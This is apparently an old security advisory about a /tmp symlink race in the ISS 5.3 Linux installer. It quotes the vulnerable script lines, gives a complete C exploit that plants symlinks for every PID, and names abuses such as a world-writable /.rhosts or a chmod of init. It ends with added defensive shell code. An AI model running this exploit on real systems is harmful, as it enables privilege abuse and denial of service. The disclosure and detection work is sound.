COMMAND

    ISS (install.iss)

SYSTEMS AFFECTED

    unices with ISS

PROBLEM

    The following was found by Fyodor and concerns the trial version of
    Internet Security Scanner for Linux (version 5.3).  The install
    program (a shell script) requires that you be root, even if you only
    want to install ISS in your home directory.  If you decide to edit
    the script and comment out the root check, you'll be rather shocked
    to see what it does in install.iss:

	# Only root can pass the next four operations.
	# Yes it's ugly - BUT IT WORKS!
	touch /tmp/.root.$$ >> /dev/null 2>&1
	chmod 600 /tmp/.root.$$ >> /dev/null 2>&1

    Obviously this is vulnerable to the standard /tmp symlink problem:
    the file name is predictable (the installer's PID), and touch follows
    an existing symlink.  Just stick the 65K symlinks in /tmp and wait
    for root to install ISS.  You might have to wait a while, and this
    scenario is pretty weird anyway.  "Why is the /tmp directory so huge?
    Why are there 65,536 symlinks to /etc/password in there?"  Admins are
    not so stupid.

    Joel Eriksson noted another issue:

    #include <stdio.h>
    #include <stdlib.h>     /* exit() */
    #include <string.h>
    #include <sys/stat.h>
    #include <unistd.h>

    #define MINPID  1
    #define MAXPID  65535

    int main(int argc, char **argv)
    {
        /* "/tmp/.root." (11) + five-digit PID (5) + NUL: assumes MAXPID
         * is 65535 or at least a five-digit number */
        char filename[16+1];
        struct stat buf;
        int i;

        if(argc != 2) {
            fprintf(stderr, "Usage: %s <file-to-create>\n", argv[0]);
            exit(1);
        }

        memset(filename, 0, sizeof(filename));

        /* Plant a symlink for every PID install.iss could get */
        for(i=MINPID; i<=MAXPID; i++) {
            snprintf(filename, sizeof(filename), "/tmp/.root.%d", i);
            symlink(argv[1], filename);
        }

        memset(filename, 0, sizeof(filename));

        /* Wait until the target appears, i.e. root ran the installer */
        while(stat(argv[1], &buf) == -1);

        /* Clean up the symlinks again */
        for(i=MINPID; i<=MAXPID; i++) {
            snprintf(filename, sizeof(filename), "/tmp/.root.%d", i);
            unlink(filename);
        }

        printf("%s was created. Filemode = 0%o\n", argv[1], buf.st_mode & 0666);

        if(! access(argv[1], W_OK))
            printf("I suppose you got lucky... (Or ran this as root.)\n");
        else
            printf("Sorry, no write permissions for you...\n");

        exit(0);
    }

    For those who can't code, or do not see the point: if root has a
    stupid umask this vulnerability may be exploited to create, for
    example, a world-writeable /.rhosts.  No matter what the umask is,
    it could easily be made to perform a DoS attack; what about changing
    the permissions on, for example, `which init` to 600...  Anyone with
    a little imagination could think of other possibilities.
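    The following is an added example, not part of the advisory or of
    the ISS package: what the install.iss root test and scratch file
    should have looked like, plus a check an admin can run on /tmp for
    the planted .root.<pid> links.  It assumes /tmp (or $TMPDIR) is the
    scratch directory and that mktemp is available.

```shell
#!/bin/sh
# Added example (not from ISS): a race-free root test, a safe scratch
# file, and a detection check for planted /tmp/.root.<pid> symlinks.

# Root test that never touches the filesystem, so there is nothing to race.
is_root() {
    [ "$(id -u)" -eq 0 ]
}

# Create a 0600 scratch file.  mktemp picks an unpredictable name and
# opens it with O_EXCL, so a symlink pre-planted at a guessed name is
# never followed; the extra checks refuse anything that is not a plain,
# non-symlink regular file.  Prints the path on success.
safe_tmpfile() {
    f=$(mktemp "${TMPDIR:-/tmp}/.root.XXXXXXXXXX") || return 1
    if [ -L "$f" ] || [ ! -f "$f" ]; then
        rm -f "$f"; return 1
    fi
    chmod 600 "$f" || { rm -f "$f"; return 1; }
    printf '%s\n' "$f"
}

# Count dangling symlinks named .root.<number> directly under a
# directory (default /tmp).  A large count is the planting pattern the
# advisory describes; a regular file or a non-numeric suffix is ignored.
count_planted_links() {
    dir=${1:-/tmp}
    n=0
    for l in "$dir"/.root.*; do
        [ -L "$l" ] || continue
        case "${l##*/.root.}" in
            *[!0-9]*|'') continue ;;
        esac
        [ -e "$l" ] || n=$((n + 1))
    done
    echo "$n"
}
```

    Run count_planted_links against /tmp from cron or a login script; any
    non-zero result on a multi-user box deserves a look before root runs
    an installer.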

SOLUTION

    I guess new versions will have that fixed.